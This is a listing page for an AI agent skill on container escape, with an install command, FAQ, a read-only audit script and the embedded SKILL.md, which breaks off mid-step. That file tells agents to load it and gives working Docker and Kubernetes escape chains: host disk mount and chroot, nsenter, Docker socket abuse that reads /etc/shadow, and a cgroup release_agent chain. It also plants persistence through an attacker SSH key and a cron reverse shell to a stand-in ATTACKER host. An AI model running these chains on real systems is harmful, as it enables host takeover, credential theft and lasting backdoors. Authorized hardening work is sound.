
Container Escape Techniques
Study authorized container and Kubernetes escape chains to harden deployments and validate misconfiguration risks.
Overview
Container Escape Techniques is an agent skill for the Ship phase that documents Docker and Kubernetes container-to-host escape chains for authorized security assessment.
Install
npx skills add https://github.com/yaklang/hack-skills --skill container-escape-techniques
What is this skill?
- Step-by-step privileged-container chains: CapEff check, host disk mount, chroot, and nsenter variants
- Docker socket abuse sequences when the CLI or API is reachable from the container
- Kubernetes-specific escape paths layered on top of base SKILL.md fundamentals
- Explicit multi-step bash recipes with expected indicators (e.g. CapEff bitmask patterns)
- Companion to main container-escape SKILL.md—load this file for chained scenarios
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).
What problem does it solve?
You run containers or clusters but cannot trace how common misconfigurations become full host compromise in practice.
Who is it for?
Builders and small teams doing authorized pentests, CTF labs, or security reviews of their own container/K8s stacks.
Skip if: Unauthorized testing on third-party systems, or teams seeking a benign CI/CD or observability integration skill.
When should I use this skill?
Load after main container-escape SKILL.md when you need chained Docker/Kubernetes escape scenarios for assessment or hardening drills.
What do I get? / Deliverables
You get repeatable escape chain playbooks you can map to hardening checks, test plans, and remediation priorities in staging or red-team engagements.
- Documented escape chain steps
- Verification commands and indicators
- Hardening checklist mapping from chains
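The settings these chains depend on (a full CapEff mask, a mounted docker.sock, a writable cgroup v1 hierarchy) can be checked read-only from inside a container. The script below is an added example, not part of the skill or its repository; the function names and the sample mountinfo lines are constructed for illustration, and the capability bit numbers are taken from linux/capability.h.

```bash
#!/bin/sh
# Added example: read-only audit of the settings the escape chains depend on.
# Bit numbers are from linux/capability.h; function names are illustrative.
RISKY_CAPS="2:CAP_DAC_READ_SEARCH 16:CAP_SYS_MODULE 17:CAP_SYS_RAWIO 19:CAP_SYS_PTRACE 21:CAP_SYS_ADMIN"

# risky_caps HEX: print the high-risk capabilities set in a CapEff mask.
risky_caps() (
    mask=$(( 0x$1 ))
    out=""
    for entry in $RISKY_CAPS; do
        bit=${entry%%:*}
        name=${entry#*:}
        if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then out="$out $name"; fi
    done
    echo "${out# }"
)

# is_full_capset HEX: succeed when capability bits 0..37 are all set,
# which covers both 0000003fffffffff and 000001ffffffffff.
is_full_capset() (
    full=$(( 0x3fffffffff ))
    [ $(( 0x$1 & full )) -eq "$full" ]
)

# audit_mounts [FILE]: flag a docker.sock mount point and read-write
# cgroup v1 hierarchies in mountinfo-format input ("-" reads stdin).
audit_mounts() {
    awk '{
        fstype = ""
        for (i = 7; i <= NF; i++) if ($i == "-") { fstype = $(i + 1); break }
        if ($5 ~ /docker\.sock$/) print "docker-socket " $5
        if (fstype == "cgroup" && $6 ~ /(^|,)rw(,|$)/) print "cgroup-v1-rw " $5
    }' "${1:-/proc/self/mountinfo}"
}

# Constructed sample, not captured from a real host.
sample_mountinfo() {
    cat <<'EOF'
1570 1400 0:52 / / rw,relatime - overlay overlay rw
1575 1570 0:30 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec - cgroup cgroup rw,memory
1576 1570 0:28 / /sys/fs/cgroup/unified ro,nosuid,nodev,noexec - cgroup2 cgroup2 rw
1580 1570 0:25 /docker.sock /run/docker.sock rw,nosuid,nodev - tmpfs tmpfs rw,mode=755
EOF
}

for m in 0000003fffffffff 00000000a80425fb; do
    echo "CapEff $m risky=[$(risky_caps "$m")]"
done
sample_mountinfo | audit_mounts -
```

Called with no argument, `audit_mounts` reads /proc/self/mountinfo of the current container; `risky_caps` takes the hex value reported by `grep CapEff /proc/self/status`.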
How it compares
Offensive escape chain reference for defenders—not a DevOps deploy or monitoring skill.
Common Questions / FAQ
Who is container-escape-techniques for?
Security-minded solo builders and infra owners who need explicit escape sequences to validate caps, mounts, sockets, and namespace settings on systems they are allowed to test.
When should I use container-escape-techniques?
During Ship security reviews before launch, when auditing privileged pods, exposed docker.sock, or shared PID namespaces, or when extending red-team exercises after loading the parent SKILL.md.
Is container-escape-techniques safe to install?
The skill encodes hostile techniques; only use on owned or contracted environments. Review the Security Audits panel on this Prism page and enforce legal authorization before any execution.
SKILL.md
SKILL.md - Container Escape Techniques
# Docker Escape Chains & Kubernetes Escape Paths

> **AI LOAD INSTRUCTION**: Load this for step-by-step container escape chains covering common misconfigurations, Docker-in-Docker scenarios, and Kubernetes-specific escape sequences. Assumes the main [SKILL.md](./SKILL.md) is already loaded for fundamental escape techniques.

---

## 1. ESCAPE CHAIN: PRIVILEGED CONTAINER → HOST ROOT

### 1.1 Full Chain (Mount + Chroot)

```bash
# Step 1: Confirm privileged mode
cat /proc/self/status | grep CapEff
# Expected: 0000003fffffffff (or 000001ffffffffff on newer kernels)

# Step 2: Identify host disk
fdisk -l 2>/dev/null
# /dev/sda1 (typical VM) or /dev/nvme0n1p1 (cloud)

# Step 3: Mount host root
mkdir -p /mnt/hostroot
mount /dev/sda1 /mnt/hostroot

# Step 4: Chroot to host
chroot /mnt/hostroot bash

# Step 5: Persistence — add SSH key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA... attacker@box" >> /root/.ssh/authorized_keys

# Step 6: Clean up (optional — remove chroot artifacts)
exit
umount /mnt/hostroot
```

### 1.2 Full Chain (nsenter — Cleaner)

```bash
# Step 1: Confirm privileged + host PID visibility
ls /proc/1/root/etc/hostname
# If readable → host PID namespace is shared or we're privileged

# Step 2: nsenter into all host namespaces
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# Step 3: Now running in host context
whoami    # root
hostname  # host hostname
```

---

## 2. ESCAPE CHAIN: DOCKER SOCKET → HOST ROOT

### 2.1 With Docker CLI Available

```bash
# Step 1: Confirm socket access
ls -la /var/run/docker.sock
docker ps  # list running containers

# Step 2: Launch privileged escape container
docker run -d --privileged --pid=host \
  -v /:/hostfs \
  --name escape alpine sleep 3600

# Step 3: Exec into escape container
docker exec -it escape chroot /hostfs bash

# Step 4: Persistence
echo 'ssh-rsa AAAA...' >> /root/.ssh/authorized_keys
# Or add cron backdoor:
echo '* * * * * root bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /etc/crontab

# Step 5: Cleanup
exit
docker rm -f escape
```

### 2.2 Without Docker CLI (curl Only)

```bash
# Step 1: List images available on host
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json \
  | python3 -c "import sys,json; [print(i['RepoTags']) for i in json.load(sys.stdin)]"

# Step 2: Create container
CONTAINER_ID=$(curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/create \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["/bin/sh"],"Tty":true,"OpenStdin":true,
       "HostConfig":{"Binds":["/:/host"],"Privileged":true}}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")

# Step 3: Start container
curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/containers/${CONTAINER_ID}/start"

# Step 4: Exec command (read host shadow)
EXEC_ID=$(curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/containers/${CONTAINER_ID}/exec" \
  -H "Content-Type: application/json" \
  -d '{"Cmd":["cat","/host/etc/shadow"],"AttachStdout":true}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")

curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/exec/${EXEC_ID}/start" \
  -H "Content-Type: application/json" \
  -d '{"Tty":true}'

# Step 5: Cleanup
curl -s --unix-socket /var/run/docker.sock \
  -X DELETE "http://localhost/containers/${CONTAINER_ID}?force=true"
```

---

## 3. ESCAPE CHAIN: CGROUP RELEASE_AGENT → HOST COMMAND EXECUTION

```bash
# Step 1: Confirm cgroup v1 + CAP_SYS_ADMIN
mount | grep cgroup
# Look for "cgroup" (not "cgroup2")
grep CapEff /proc/self/status
# Need at minimum CAP_SYS_ADMIN

# Step 2: Find writable cgroup mount
d=$(dirname $(ls -x /s*/fs/c*/*/r* 2>/dev/null | head -n1))
[ -z "$d" ] && echo "No writable cgroup found" && exit 1

# Step 3: Create a child cgroup
mkdir -p "$d/escape"

# Step 4: Enable release notification
echo 1 > "$d/escape/notify_on_release"

# Step 5: Set release_agent to our sc